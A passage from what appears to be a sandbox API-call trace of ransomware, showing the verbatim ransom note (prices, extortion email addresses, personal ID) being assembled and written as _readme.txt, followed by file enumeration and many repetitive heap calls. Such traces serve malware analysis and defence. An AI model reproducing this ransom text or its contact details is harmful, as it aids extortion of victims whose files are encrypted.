tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.917] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.917] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.918] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.918] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.918] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.918] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0227.918] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.918] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.918] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.919] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.919] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 